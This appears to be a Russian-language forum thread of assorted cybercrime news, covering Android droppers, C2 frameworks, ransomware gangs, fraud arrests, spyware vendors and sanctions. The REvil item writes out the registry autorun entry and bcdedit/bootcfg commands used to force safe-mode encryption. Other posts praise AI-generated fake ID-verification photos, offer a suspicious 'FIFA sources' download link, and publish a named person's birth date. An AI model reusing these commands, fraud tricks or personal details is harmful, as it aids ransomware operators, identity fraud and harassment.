Изучая эту кампанию, эксперты обнаружили интересный аспект: Android-приложения злоумышленников были созданы с помощью платформы Zombinder, которая предлагает привязку вредоносного дроппера к легитимным приложениям для Android. По данным исследователей, Zombinder был запущен в марте 2022 года и в настоящее время становится все более популярным среди хакеров.
APK-файлы, используемые в этой кампании, были разными. Так, аналитики наблюдали фейковое приложение для прямых футбольных трансляций и модифицированные версии приложений социальных сетей. Подчеркивается, что все они работают должным образом, потому как функциональность оригинального приложения не удаляется и не страдает, просто Zombinder добавляет к исходному коду загрузчик малвари.
Загрузчик обфусцирован, чтобы избежать обнаружения, поэтому, когда пользователь запускает приложение, загрузчик отображает запрос якобы на установку плагина. Таким способом он установит на устройство жертвы вредоносный пейлоад, а после запустит его в фоновом режиме.
[](https://xakep.ru/wp- content/uploads/2022/12/409196/streaming-app.jpg)
При этом авторы Zombinder утверждают, что такие вредоносные приложения невозможно обнаружить во время выполнения, они могут обходить защиту Google Protect и антивирусы, работающие на устройствах жертв.
[](https://xakep.ru/wp- content/uploads/2022/12/409196/zombinder.jpg)
Как уже было сказано выше, таким способом среди пользователей Android распространяется банкер Ermac, способный осуществлять кейлоггинг, оверлейные атаки, кражу писем из Gmail, перехват кодов 2ФА, а также воровать seed-фразы криптокошельков. Аналогичным образом Zombinder помогает распространению банковского трояна Xenomorph и малвари Sova.
Нужно сказать, что если на сайте злоумышленников жертва выберет загрузку софта для Windows, то на ее машину попросту загрузится вышеперечисленная десктопная малварь (Erbium, Aurora и Laplas). То есть к этой части кампании Zombinder отношения не имеет.
«Такое разнообразие троянов может свидетельствовать о том, что вредоносная целевая страница используется несколькими киберпреступниками и предоставляется им в рамках некой сторонней службы по распространению [малвари]», — предполагают исследователи.
Click to expand...
Специалисты Cisco Talos обнаружили новый наступательный [фреймворк Manjusaka](https://blog.talosintelligence.com/2022/08/manjusaka-offensive- framework.html), который они называют «китайским братом Sliver и Cobalt Strike».
Manjusaka переводится как «ликорис» и это название рода цветковых растений, состоящего из более чем 20 видов. Феймворк написан на Rust (двоичные файлы написаны на не менее универсальном Go) и рекламируется как эквивалент Cobalt Strike, способный работать как Windows, так и с Linux. Считается, что его разработчик находится в китайской провинции Гуандун.
«Полнофункциональная версия C&C, написанная на Go с пользовательским интерфейсом на упрощенном китайском языке находится в свободном доступе и позволяет легко создавать новые имплантаты с кастомными конфигурациями, что увеличивает вероятность более широкого использования этого фреймворка злоумышленниками», — предупреждают эксперты.
Click to expand...
Напомню, что Sliver и Cobalt Strike представляют собой легитимные инструменты для пентестеров и red team, ориентированные на эксплуатацию и постэксплуатацию. К сожалению, они давно любимы хакерами, начиная от правительственных APT-группировок и заканчивая операторами шифровальщиков.
Исследователи говорят, что Manjusaka, можно развернуть в качестве альтернативы Cobalt Strike или параллельно с ним, в качестве запасного варианта. Так, Manjusaka был обнаружен во время расследования инцидента, в ходе которого клиент Cisco Talos подвергся заражению Cobalt Strike, но во время расследования выяснилось, что в этом случае злоумышленники использовали не только этот фреймворк.
Отчет компании гласит, что версии малвари для Windows и Linux обладают почти одинаковыми возможностями и аналогичными коммуникационными механизмами. Имплантаты Manjusaka состоят из RAT и модуля файлового менеджера, каждый из которых имеет свои особенности.
RAT поддерживает выполнение произвольных команд через cmd.exe, собирает учетные данные, хранящиеся в браузерах, SSID и пароли от Wi-Fi, а также обнаруживает сетевые подключения (TCP и UDP), имена учетных записей, локальные группы и так далее. Также он может воровать учетные данные Premiumsoft Navicat, делать скриншоты текущего рабочего стола, составлять списки запущенных процессов и даже проверять характеристики оборудования и его температуру.
Модуль файлового менеджера, в свою очередь, способен составлять списки файлов, создавать каталоги, узнавать полные пути к файлам, читать и записывать содержимое файлов, удалять файлы и каталоги, а также перемещать файлы.
[](https://xakep.ru/wp-
content/uploads/2022/08/397592/file-management.jpg)
В настоящее время Manjusaka, похоже, лишь предварительно развернут для
тестирования, поэтому как разработка фреймворка явно еще не завершена. Тем не
менее, эксперты считают, что Manjusaka уже достаточно готов и мощен для
использования в реальных атаках.
Кроме того, исследователи обнаружили в рекламном посте автора малвари схему, на которой изображены компоненты, пока не реализованные в пробных версиях. Неясно, означает ли это, что они недоступны в «бесплатной» версии, используемой в изученной атаке, или еще не доработаны автором.
[](https://xakep.ru/wp- content/uploads/2022/08/397592/framework.jpg)
«Новый фреймворк обладает всеми функциями, которые можно ожидать от такого имплантата, однако он написан на самых современных и портируемых языках программирования. Разработчик фреймворка может легко интегрировать новые целевые платформы, такие как MacOSX или более экзотические варианты Linux, например, те, что работают на встроенных устройствах», — считают аналитики.
Click to expand...
Группа киберпреступности
Исследователи кибербезопасности подробно описали тактику «растущей» банды
киберпреступников под названием «Read The Manual» (RTM) Locker, которая
действует как частный поставщик программ-вымогателей как услуги (RaaS) и
осуществляет оппортунистические атаки для получения незаконной прибыли.
«Банда «Read The Manual» Locker использует аффилированных лиц для получения выкупа от жертв, все из которых вынуждены соблюдать строгие правила банды», — говорится в отчете компании по кибербезопасности Trellix, опубликованном The Hacker News .
«Деловая структура группы, в которой аффилированные лица должны оставаться активными или уведомлять банду о своем уходе, показывает организационную зрелость группы, как это наблюдалось и в других группах, таких как Conti » .
Источник: <https://thehackernews.com/2023/04/rtm-locker-emerging-cybercrime- group.html>
Новая функция позволяет REvil обходить обнаружение решениями безопасности и эффективнее шифровать файлы.
Вымогательское ПО REvil получило новую функцию, позволяющую ему шифровать файлы на компьютере жертвы в безопасном режиме Windows (Windows Safe Mode). Вероятно, разработчики вымогателя добавили ее для того, чтобы он мог обходить обнаружение решениями безопасности и эффективнее шифровать файлы.
Безопасный режим Windows - это особый режим загрузки Windows, позволяющий
пользователям выполнять на операционной системе административные и
диагностические задачи. В этом режиме загружается только самый минимум
программ и драйверов, необходимых для работы ОС. Кроме того, запускающееся
автоматически ПО в безопасном режиме не включаются (если автозапуск не был
специально настроен для этого).
Одним из способов настройки автозапуска той или иной программы в безопасном
режиме является создание записей в следующих разделах реестра:
Ключи Run запускают программу после каждой авторизации пользователя на системе, а RunOnce запускают программу только один раз, после чего запись удаляется из реестра.
Для выполнения автозапуска в безопасном режиме в начале значения имени нужно
добавить "звездочку" (*).
Например:
Code:Copy to clipboard
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "*Startup"="C:\Users\test\test.exe".
В новый вариант REvil был добавлен аргумент командной строки -smode, вызывающий принудительную перезагрузку компьютера в безопасном режиме перед его шифрованием. Для этого вымогатель выполняет команду, заставляющую компьютер перезагружаться в безопасном режиме с сетевыми драйверами (Safe Mode with Networking) при следующем запуске Windows: bootcfg /raw /a /safeboot:network /id 1 bcdedit /set {current} safeboot network.
Далее REvil создает ключ RunOnce "*franceisshit", выполняющий "bcdedit /deletevalue {current} safeboot" после того, как пользователь авторизуется в безопасном режиме. И наконец, вымогатель вызывает принудительный перезапуск Windows, который жертва не может прервать.
Непосредственно перед завершением процессов REvil создает дополнительный RunOnce "AstraZeneca", перезапускающий вымогательское ПО уже без аргумента -smode при авторизации следующего пользователя после перезагрузки компьютера. Когда пользователь авторизуется на системе, REvil выполняется и шифрует файлы.
Windows также запускает сконфигурированную ключом реестра *AstraZeneca команду bcdedit /deletevalue {current} safeboot для перезагрузки компьютера в обычном режиме после того, как REvil завершит шифрование файлов.
Пока вымогатель шифрует файлы, экран безопасной загрузки остается пустым, но пользователь может вызвать Диспетчер задач, нажав Ctrl+Alt+Delete, и увидеть процесс выполнения файла smode.exe. Однако запустить какую-либо программу через Диспетчер задач пользователь не сможет.
После того, как устройство будет зашифровано, загрузка системы продолжится, а на рабочем столе появится записка с требованием выкупа.
В ИБ-компании PRODAFT изучили панель управления TeslaGun — ранее недокументированный софт, который криминальная группа TA505, она же Evil Corp, использует для подачи команд резидентным бэкдорам ServHelper.
Как оказалось, С2-инфраструктура в данном случае сильно зависит от работоспособности серверов молдавского провайдера MivoCloud, а 8% жертв вредоносных атак проживают в России.
Группировка TA505/Evil Corp, также известная в ИБ-сообществе как Gold Drake, Dudear, Indrik Spider и CHIMBORAZO, уже 15 лет охотится за чужими деньгами. Согласно отчету швейцарских экспертов (доступен в PDF на сайте PRODAFT), ее преимущественно интересуют пользователи онлайн-банкинга и заядлые шоперы, а также владельцы криптокошельков.
Данная ОПГ примечательна тем, что часто меняет стратегию вредоносных атак, отслеживая и быстро осваивая новые техники, чтобы собрать урожай до ответной реакции ИБ-индустрии. На Западе склонны приписывать TA505 российские корни или как минимум считать этих хакеров выходцами из Восточной Европы.
Из самопальных инструментов TA505 наиболее известен Dridex — банковский троян, в последние годы используемый как загрузчик других вредоносных программ, в том числе шифровальщиков. Данную кибергруппу также ассоциируют с бестелесным трояном FlawedAmmyy, ботнетом Kasidet/Neutrino и Windows-бэкдором, получившим кодовое имя ServHelper.
Панель управления TeslaGun, попавшая в поле зрения швейцарских экспертов, не обременена лишними деталями. Из отображаемой информации в ней представлены только данные о заражениях (в сводной таблице), раздел комментариев для каждой жертвы и несколько опций для фильтрации записей.
С помощью TeslaGun можно также подавать команды устройствам с ServHelper- имплантом — по отдельности или всем сразу. Кроме того, в настройках можно задать автозапуск конкретной команды при добавлении новых жертв.
Прокси-серверы с панелью управления бэкдором злоумышленники часто переносят в
пределах одного и того же дата-центра. Большинство выявленных IP-адресов
принадлежат молдавскому хостинг-провайдеру:

После внедрения ServHelper автору атаки предоставляется возможность
подключиться к зараженной машине через скрытые RDP-туннели — вручную, подав из
консоли специальную команду (bk). С этой целью был создан специальный
инструмент; такие соединения устанавливаются через выбранный порт прокси-
сервера.
Анализ информации о заражениях, найденной в TeslaGun, показал, что с июля 2020
года вредоносные атаки TA505 собрали как минимум 8160 жертв — в основном в США
(3667). В пятерку стран-лидеров по этому показателю также вошли Россия (647),
Бразилия (483), Румыния и Великобритания (444 и 359 соответственно).

Новое исследование голландского специалиста Тома Мерса из Университета Твенте выявило факторы, влияющие на вероятность того, что жертвы вымогательского ПО заплатят выкуп злоумышленникам.
Для анализа были использованы данные полиции Нидерландов о 382 происшествиях и информация от компании по реагированию на инциденты еще о 100 случаях за период с 2019 по 2022 годы. Подавляющее большинство атак было направлено именно на голландские компании.
Из 430 жертв за указанный период 28% решили пойти хакерам на уступки. Средняя сумма выкупа составила чуть более 431 000 евро.
Компании, привлекавшие сторонних специалистов, гораздо чаще соглашались платить - более 50% случаев, по сравнению с 21% среди обратившихся только в полицию.
Организации, у которых было страховое покрытие на случай атак вымогателей, платили в среднем значительно большие суммы - около 708 000 евро против 133 000 евро у незастрахованных фирм. Однако наличие страховки не повлияло на долю компаний, согласившихся на условия злоумышленников: она была одинаковой в обеих группах.
Хотя компании, имевшие резервные копии данных, реже соглашались платить выкуп, размер потраченных ими сумм оказался выше. Вероятно, причина в том, что они обладали особо ценной информацией, потерю которой нельзя было допускать.
Особенно сильно на решение платить и размер выкупа влияли случаи кражи данных злоумышленниками. В этих ситуациях доля заплативших возрастала до 40%, а средний размер выкупа был более чем в 13 раз выше - около 1,2 млн евро.
Наиболее привлекательными мишенями оказались IT-компании, которые в среднем платили более 268 000 евро. Это связано с критической важностью их сервисов для множества клиентов.
Исследование выявило ряд факторов, влияющих на поведение жертв при атаках вымогателей. Выводы ученых помогут как компаниям, так и правоохранительным органам в борьбе с растущей угрозой вымогательских атак.
sc: utwente.nl/nieuws/2024/1/1318314/ut-brengt-besluitvormingsproces- slachtoffers-ransomware-in-kaart
• На
Reddit
были опубликованы реалистичные "фото", которые сгенерированы ИИ и отлично
подходят для верификации личности )) На одном фото девушка с сигной, а на
втором - с id картой.
• В комментариях можете прочитать, как автору удалось сгенерировать такие
изображения:
Группа злоумышленников изготавливала специальные скимминговые устройства, которые копировали данные магнитных лент банковских карт.
Вместе с тем-устанавливали миникамеры, направленные на пин-клавиатуру, которые записывали введенную информацию.
В дальнейшем участники группы изготавливали дубликаты карточек, из которых провели около четырех тысяч операций обналичивания. Таким образом государственному банку было нанесено более 1,5 миллиона гривен убытков.
Фигурантам объявили о подозрении по ч. 3 ст. 28 (Совершение уголовного правонарушения организованной группой), ч. 2 ст. 200 (Незаконные действия с документами на перевод, платежными карточками, оборудованием для их изготовления), ст. 231 (Незаконное собирание с целью использования или использование сведений, составляющих коммерческую или банковскую тайну), ч. 3 ст. 359 (Незаконные использование специальных технических средств получения информации), ч. 2 ст. 361 (Несанкционированное вмешательство в работу компьютеров, автоматизированных систем, компьютерных сетей или сетей электросвязи), ч. 4 ст. 190 (Мошенничество) Уголовного кодекса Украины. Подозреваемым грозит до двенадцати лет лишения свободы с конфискацией имущества.
Сейчас досудебное расследование в уголовном производстве завершено. Обвинительный акт правоохранители направили в суд. Процессуальное руководство осуществлял офис Генерального прокурора Украины.
• Source: npu.gov.ua/news/kiberzlochini/u-kijevi-suditimut-organizovanu- zlochinnu-grupu-za-nanesennya-banku-ponad-1-5-miljona-griven-zbitkiv/
На этот раз мошенники выдают себя за Т-Банк.
Простые советы для тех, кто не хочет становиться мамонтом и потерять свои сбережения:
— Не устанавливайте незнакомые приложения и тем более не вводите в них свои данные
— Читайте отзывы других пользователей
— Не вводите личные данные на подозрительных сайтах в Интернете
— Используйте браузеры с протоколами TLS, которые обеспечивают защищенную передачу данных в интернете. Такой сертификат по умолчанию встроен в Яндекс Браузер
Якобы сурсы последней FIFA
Скачать :MEGA.NZ
Источник : bit.ly/3iO314P
Злоумышленники создавали и рассылали фишинговые ссылки под видом оформления социальных выплат. Таким образом они получили доступ к счетам более 1500 человек и в дальнейшем присвоили их деньги. Фигуранты задержаны, им сообщено о подозрении.
Противоправную деятельность восьмерых мужчин разоблачили сотрудники управления противодействия киберпреступлениям Львовщины совместно со следственным отделом Львовского районного управления полиции № 2 областного главка в сотрудничестве с работниками служб безопасности ПриватБанка.
Четверо жителей Кривого Рога переехали на Львовщину и привлекли еще четырех товарищей для реализации преступной схемы.им ссылкой, злоумышленники получали данные банковских карточек граждан и входили в учетные записи онлайн-банкинга. В дальнейшем фигуранты заменяли финансовые номера телефонов на подконтрольные.
Со счетов потерпевших злоумышленники рассчитывались на автозаправках, а также снимали наличные.
По предварительным данным, участники группировки получили доступ к онлайн- банкингу около 1500 человек. Общая сумма ущерба составляет 6 миллионов гривен.
В домах и в автомобилях злоумышленников сотрудники полиции провели обыски. Изъяты четыре десятка мобильных телефонов, компьютерная техника, банковские карты и SIM-карты, использовавшиеся в противоправной деятельности.
Мужчин задержали в порядке ст. 208 Уголовного процессуального кодекса Украины.
Следователи объявили фигурантам подозрения в совершении мошенничества, созданы и участии в преступной организации - ч. 4 ст. 190, ч. 1, 2 ст. 255.
Также трем участникам группы объявлено подозрения по факту несанкционированного вмешательства в работу информационных (автоматизированных), электронных коммуникационных, информационно- коммуникационных систем, электронных коммуникационных сетей - ч. 5 ст. 361 Уголовного кодекса Украины.
Следственные действия продолжаются.
Израильская фирма Candiru предлагает хакерские инструменты, используемые для взлома компьютеров и серверов, а также технологию для взлома мобильных устройств. У фирмы нет web-сайта, ее сотрудники не обновляют свои профили LinkedIn с указанием места работы. Как сообщает газета TheMarker, утекшие документы и судебные дела между компанией и бывшим старшим сотрудником, раскрыли некоторые подробности об ее внутренней деятельности.
Согласно документу, подписанному неназванным вице-президентом Candiru, фирма предлагает «высококлассную платформу киберразведки, предназначенную для проникновения в персональные компьютеры, сети и мобильные телефоны». Система позволяет тайно проводить эффективные и масштабируемые операции киберразведки на отдельных мобильных устройствах.
«После развертывания, неотслеживаемое ПО немедленно идентифицирует и отображают сети, к которым подключена цель. Система инициирует замаскированные процессы по кражи данных путем манипуляции и контроля над устройствами и локальными программами, включая социальные сети, коммуникационные программы или приложения, доступ к микрофону или камере телефона или компьютера», — сообщается в документах компании.
Как утверждает Candiru, ее система может работать по всему миру, но ее нельзя развернуть в США, Израиле, России и Китае.
Цитата, вероятно, относится к началу 2019 года, когда речь идет о поддержке"последних" версий iOS № 12.1.1 и Safari (Apple browser) № 12.0.2. Также было написано, что система имеет возможности для устройств Samsung вплоть до версии S9 (анонсированной в начале того же года). Также было написано, что кендиро поддерживает взлом систем хранения информации Netapp.
Предложение, вероятно, предназначено для европейской страны, и цена сделки указана в евро. Было написано, что стоимость системы составляет 23,5 миллиона евро, но после скидки ее цена составляет 16,8 миллиона евро. Примерно половина суммы должна быть выплачена заранее, 40% - в момент поставки системы и еще 10% - в период"обучения" .
Click to expand...
Компания несколько раз меняла название: она начинала как Candiru, затем стала D.F. Associates, затем преобразовалась в Greenwick Solutions. В прошлом году ее также называли Tabatha Ltd., а теперь она известна как Saito Tech.
Компания помогает правоохранительным органам и спецслужбам в разных странах без разрешения взламывать компьютерные системы, вести наблюдение, похищать информацию и даже наносить ущерб.
• Source: https://www.themarker.com/technation/1.9123100
*****
Войдя в вестибюль здания в Тель-Авиве, где находится штаб-квартира компании, вы не найдете ее названия в общем списке фирм. Не найдете вы и ее веб-сайта - его просто нет. 120 сотрудников Candiru не публикуют свои профили в LinkedIn и при поступлении на работу подписывают соглашения о строгой конфиденциальности. На запрос TheMarker прокомментировать статью эта компания ответила вежливым, но твердым отказом.
Компания Candiru получила свое название в честь рыбки-паразита, которая водится в Амазонке. Эта извивающаяся полупрозрачная рыбка длиной 15 см проникает в жабры других рыб и питается их кровью. Она способна проникнуть и в анальное отверстие человека, после чего без хирургического вмешательства от нее не избавиться. Название вполне соответствует специализации компании, которая занимается разработкой хакерских программ для взлома компьютеров и смартфонов, и ведения слежки за их обладателями.
Разработка вредоносных программ спецназначения в Израиле - крупный бизнес, и отраслевые источники сообщают, что доход от него составляет около 1 млрд. долларов в год. Самым крупным и самым спорным игроком на этом рынке является NSO, которая, согласно многочисленным сообщениям, продает свое оборудование таким странам, как Саудовская Аравия и Мексика, использующим его для слежки за диссидентами.
Специализация NSO - взлом смартфонов. Инструменты Candiru используются для взлома компьютеров и серверов, хотя некоторые источники сообщили TheMarker, что фирма располагает также технологиями для взлома мобильных устройств. В отличие от NSO, Candiru более консервативна в выборе клиентов, большинство которых находятся в западной Европе и ни одного - в Африке. Сообщается также, что компания не продает свое оборудование в Израиле, но причины этого чисто коммерческие, а не политические.
«Если, скажем, Германии для решения ряда проблем, связанных с обеспечением национальной безопасности, потребуются хакерские программы, она, несомненно, разработает их самостоятельно, - пояснил источник, пожелавший остаться анонимным. - Но если подобные программы понадобятся Германии в рамках борьбы с контрабандой живого товара из Турции, она купит их за рубежом, поскольку секретность тут менее важна».
Политика продаж Candiru – это результат внутреннего решения фирмы: многие израильские компании, действующие в этой сфере, попали в серьезные неприятности, поскольку продавали свою продукцию антидемократическим режимам, известным своими нарушениями прав человека.
Израиль считает, что хакерские программы ничем не отличаются от других видов оружия, поэтому их экспорт должен быть одобрен министерством обороны. Однако министерство в первую очередь следит за тем, чтобы экспорт не поставил под угрозу безопасность страны, в то время как возможные нарушения прав человека со стороны покупателей заботят его значительно меньше.
Круг клиентов – не единственное, что отличает Candiru от многих подобных компаний, таких, например, как Hacking Team и FinFisher, которые продают только программное обеспечение, в то время как первая предлагает заказчику целую систему.
«У них есть пользовательский интерфейс, через который клиент видит, во сколько объектов удалось проникнуть, какая информация была получена и так далее, - сообщил один из источников. - Кроме того, они предлагают очень сложный сервис, так что, если какая-либо программа взлома не сработает, они создадут новую, которая достигнет цели».
Candiru, основанную четыре года назад, окружает ореол тайны. Считается, что в ней работает примерно 120 человек, а годовой объем продаж составляет 30 млн. долларов, но это только оценки, сделанные сторонними наблюдателями. Если это правда, Candiru - вторая по величине израильская компания (после НСО) по разработке кибер-оружия, не считая котирующейся на бирже Verint и крупных оборонных предприятий.
Ицхак Зак
Известно, что основателем Candiru является Ицхак Зак, который также основал NSO. Зак - венчурный инвестор, он входит в число создателей инвестиционных фирм Founders Group и Pico Venture Partners.
Эйтан Ахлоу
Генеральный директор Candiru - Эйтан Ахлоу, в прошлом руководитель израильской компании Gett. Но в соответствии с политикой секретности Candiru, на странице Ахлоу в LinkedIn указано, что он работает в компании в скрытом режиме. Этим отраслевым термином пользуются фирмы, которые еще не выпустили продукт и работают без рекламы.
Согласно справочнику Dun & Bradstreet, Зак входит в советы директоров 13 компаний, в том числе стартапов, специализирующихся на киберзащите, таких, как Cy-Ot и Orchestra. В соответствии с тем же принципом секретности Candiru не указана в списке фирм, директором которых является Зак.
Дело в том, что Candiru зарегистрирована под другим именем. Первоначально, в сентябре 2014 года, она была зарегистрирована как Grindavik Solutions, в марте 2017 название было изменено на LDF Associates, но в апреле прошлого года она снова превратилась в Grindavik.
Как и другие компании в прославленной израильской индустрии кибербезопасности, Candiru набирает большую часть своего штата из числа выпускников разведывательного подразделения ЦАХАЛа «8200». Как правило, их зарплата составляет 80 тысяч шекелей в месяц, а некоторые получают и 90 тысяч.
«Они набирают лучших хакеров, которые только есть в подразделении «8200», - сказал предприниматель, действующий в сфере кибербезопасности, который предпочел анонимность. - Candiru не ставит своим сотрудникам никаких условий - делай, что заблагорассудится. Один, например, живет во Франции и включает свой компьютер, когда у него есть настроение».
A high-level manager and systems administrator associated with the [FIN7 threat actor](https://thehackernews.com/2018/08/fin7-carbanak-cobalt- hackers.html) has been sentenced to 10 years in prison, the U.S. Department of Justice announced Friday.
Fedir Hladyr , a 35-year-old Ukrainian national, is said to have played a crucial role in a criminal scheme that compromised tens of millions of debit and credit cards, in addition to aggregating the stolen information, supervising other members of the group, and maintaining the server infrastructure that FIN7 used to attack and control victims' machines.
The development comes after Hladyr pleaded guilty to conspiracy to commit wire
fraud and one count of conspiracy to commit computer hacking in September
2019. He was arrested in Dresden, Germany, in 2018 and extradited to the U.S.
city of Seattle. Hladyr has also been ordered to pay $2.5 million in
restitution.
"This criminal organization had more than 70 people organized into business
units and teams. Some were hackers, others developed the malware installed on
computers, and still others crafted the malicious emails that duped victims
into infecting their company systems," said Acting U.S. Attorney Tessa A.
Gorman.
"This defendant worked at the intersection of all these activities and thus bears heavy responsibility for billions in damage caused to companies and individual consumers."
Also called Anunak, Carbanak Group, and the Navigator Group, the malware campaign unleashed by FIN7 is estimated to have caused overall damage of more than $3 billion to banks, merchants, card companies, and consumers.
The attacks involved targeting the restaurant, gaming, and hospitality
industries by sending spear-phishing emails containing decoy documents with
the goal of plundering customer payment card data, which were then used or
sold for profit in online underground marketplaces at least since 2015.
In the U.S. alone, FIN7 has been responsible for the theft of more than 20
million customer card records from over 6,500 individual point-of-sale
terminals at more than 3,600 separate business locations. Besides the U.S.,
FIN7 attackers left their fingerprints in a string of orchestrated intrusions
against retailers in the U.K., Australia, and France. Some of its high-profile
victims included Chipotle Mexican Grill, Chili's, Arby's, Red Robin, and
Jason's Deli.
At the sentencing hearing, Hladyr said he had "ruined years of my life and put [his] family through great risk and struggle."
]Хотя квантовые вычисления все еще находятся на начальном этапе разработки, правительства и компании частного сектора, такие как Microsoft и Google, работают над воплощением данных идей их в жизнь. В течение десятилетия квантовые компьютеры могут стать достаточно мощными, чтобы взломать криптографическую безопасность мобильных телефонов, банковских счетов, адресов электронной почты и биткойн-кошельков.
В настоящее время по всему миру используется так называемая асимметричная криптография, в которой используется пара закрытых и открытых ключей для доступа к таким учетным записям и криптокошелькам.
«Каждое финансовое учреждение, каждая авторизация в систему на телефоне основано на асимметричной криптографии, которая уязвима к взлому с помощью квантового компьютера», — пояснил бывший директор компании Utimaco Фред Тиль (Fred Thiel), работавшей с Microsoft, Google и другими техногигантами над постквантовым шифрованием.
Эксперты в области криптовалютных технологий сообщили CNBC, что их не беспокоит квантовый взлом биткойн-кошельков.
«У нас было бы много предупреждений, если бы квантовые вычисления достигли той стадии зрелости и совершенства, на которой они начали угрожать нашим основным криптографическим алгоритмам. Однако это не произойдет в одночасье», — пояснил сооснователь компании Castle Island Ventures Ник Картер (Nic Carter).
Сообщество ИБ-экспертов, включая Национальный институт науки и технологий (NIST), прекрасно осведомлено о данной проблеме уже находятся в процессе создания квантово-безопасной криптографии.
Появления первого стандартного квантово-безопасного криптографического алгоритма ожидается к 2024 году. По словам экспертов, это произойдет еще задолго до того, как мир увидит квантовый компьютер, способный взломать криптографию биткойнов. Как только будет создана новая стандартизированная постквантовая безопасная криптография, начнется процесс массовой миграции. Каждый владелец криптовалюты будет переводить свои средства на новый кошелек или новую учетную запись, защищенную более безопасным типом ключа.
Современные проблемы требуют современных решений. Этим принципом сейчас руководствуются многие, не исключая преступников.
В нескольких крупных городах Техаса на парковочных счетчиках [появились](https://arstechnica.com/tech-policy/2022/01/scammers-put-fake-qr- codes-on-parking-meters-to-intercept-parkers-payments/) поддельные QR-коды. Сотрудники парковки недавно обнаружили наклейки с фальшивыми QR-кодами на платных парковках в Остине, Хьюстоне и Сан-Антонио. Всего в ходе проверки было обнаружено более 100 таких наклеек.
Полиция Сан-Антонио предупредила общественность о мошенничестве 20 декабря, заявив, что «люди, пытающиеся оплатить парковку с помощью этих QR-кодов, могут быть перенаправлены на мошеннический веб-сайт и отправить платеж поддельному продавцу». Вскоре следы подобных афер были обнаружены в городах Остин и Хьюстон.
После уведомления со стороны властей Сан-Антонио департамент транспорта Остина начал проверять свои собственные счетчики. Сотрудники департамента проверили около 900 станций оплаты парковки в городе и обнаружили мошеннические QR-коды на 29 из них.
Расследование выявило, что поддельные QR-коды направляли людей на веб-сайт «Быстрая оплата парковки» в домене passportlab.xyz, который в настоящее время уже отключен. Пока еще неясно, сколько людей — если таковые имеются — были обманом вынуждены заплатить мошенникам.
«Именно по этой причине мы вообще не используем QR-коды для оплаты парковки. Их слишком легко подделать и разместить на устройствах», — сказал менеджер отдела парковки Остина Джейсон Редферн. «И мы уже не раз слышали от наших партнёров, что это вполне возможно». Паркоматы Остина принимают платежи прямо на счетчике наличными или картой, а также с помощью мобильного платежного приложения Park ATX.
Городские власти Остина заявили в пресс-релизе, что они «до завершения расследования продолжают инспектировать городские платежные станции, чтобы убедиться, что там не появятся новые поддельные QR-коды». Полиция Остина призвала людей звонить в службу 911, если они увидят, что кто-то без значка городского служащего вмешивается в работу паркоматов. «Любой человек, который считает, что он стал жертвой взлома кредитной карты из-за недавних платежей по парковочному счетчику, должен подать заявление в полицию и немедленно уведомить эмитента своей карты», — также заявили городские власти.
Официальные лица Хьюстона также сообщили, что обнаружили пять счетчиков с поддельными QR-кодами и удалили эти наклейки. Как и в Остине, власти Хьюстона не используют QR-коды на парковочных счетчиках, ограничиваясь платежным приложением.
Хотя эта афера, похоже, была ограничена только штатом Техас, она может повториться где угодно. Поэтому внимательно относитесь к быстрым платежам вообще и по QR-коду в частности и не ленитесь лишний раз убедиться, что вы платите именно продавцу, а не очередному специалисту по «сравнительно честным способам отъёма денег у населения»
США и Великобритания ввели санкции в отношении 11 граждан России, которых считают причастными вымогательским операциям TrickBot и Conti.
Напомню, что хак-группа TrickBot (она же ITG23, Gold Blackburn и Wizard Spider) считается финансово мотивированной группировкой, которая известна в основном благодаря разработке одноименного банковского трояна TrickBot.
С годами TrickBot эволюционировал из классического банкера, предназначенного для кражи средств с банковских счетов, до многофункционального дроппера, распространяющего другие угрозы (от майнеров и шифровальщиков до инфостилеров). В прошлом году TrickBot и вовсе перешел под управление операторов малвари Conti, которая использовала вредоносное ПО группы для поддержания собственных атак и усиления таких вредоносов как BazarBackdoor и Anchor.
После февраля 2022 года исследователь слил внутреннюю переписку группировки Conti, а вскоре после этого другой человек под псевдонимом TrickLeaks начал сливать информацию о работе TrickBot, что подтвердило связь между этими группировками.
В конечном итоге эти утечки привели к тому, что Conti прекратила свою деятельность и распалась на несколько других группировок, включая Royal, Black Basta и ZEON.
Как теперь сообщают правительств США и Великобритании, на 11 участников TrickBot и Conti теперь наложены санкции в связи с их киберпреступной деятельностью, которая привела к краже 180 млн долларов у компаний и организаций по всему миру.
«По оценкам NCA, эта группа была ответственна за вымогательство не менее 180 млн долларров у жертв по всему миру, а также не менее 27 млн фунтов стерлингов у 149 жертв в Великобритании. Целью злоумышленников становились британские больницы, школы, местные органы власти и предприятия», — заявляет Национального агентства по борьбе с преступностью Великобритании.
Click to expand...
Министерство финансов США тоже объявило о введении санкций:
«Сегодняшние цели включают ключевых участников, вовлеченных в управление и снабжение группировки Trickbot, которая атаковала правительство США и американские компании, включая больницы, — гласит заявление Министерства финансов. — Во время пандемии COVID-19 группа Trickbot атаковала многие объекты критической инфраструктуры и медицинские учреждения в США».
Click to expand...
Результатом введенных санкций должна стать блокировка всего имущества и средств, принадлежащих хакерам, в США и Великобритании. Также физическим лицам и компаниям отныне запрещено совершать транзакции с этими физическими лицами, включая выплаты выкупов.
Ниже перечислены 11 человек, в отношении которых введены санкции. По данным властей, все они являются гражданами России.
Все это дополняет санкции, уже введенные против семи участников TrickBot в феврале 2023 года.
Как уже отмечалось выше, после «закрытия» Conti многие участники группировки перешли в других хак-группы, то есть введенные санкции могут значительно затруднить выплату выкупов другим вымогателям. Считается, что в этот список входят BlackCat, Royal Group, AvosLocker, Karakurt, LockBit, Silent Ransom и DagonLocker.
В прошлом аналогичные санкции уже приводили к закрытию и «ребрендингу» вымогательских групп, так как фирмы-переговорщики отказывались перечислять выплаты лицам, попавшим под санкции.
Власти Италии приняли и привели в исполнение решение об экстрадиции известного продавца устройств для вскрытия и угона автомобилей Даниила Олейника, более известного под ником WASP Killer.
Олейник Даниил Сергеевич 29.08.1976 года рождения, также известного по
прозвищу “Wasp Killer”.
Для кого то "Васп", для кого то Даня.
Об этом сообщили сразу несколько источников, подчеркнувших, что у него есть только российское гражданство.
Первым информацию о выдаче Олейника распространил известный в сегменте пробива пользователь Jeka187. Позднее опубликованные им сведения подтвердил блогер и создатель экстремистского движения «Мужское государство» Владислав Поздняков, назвавший Олейника своим старым другом.
«Его услугами пользовались и представители наших спецслужб. В украинской тюрьме его ждут пытки и мучения», — предположил Поздняков, посетовавший на то, что Киев заполучил российского гражданина.
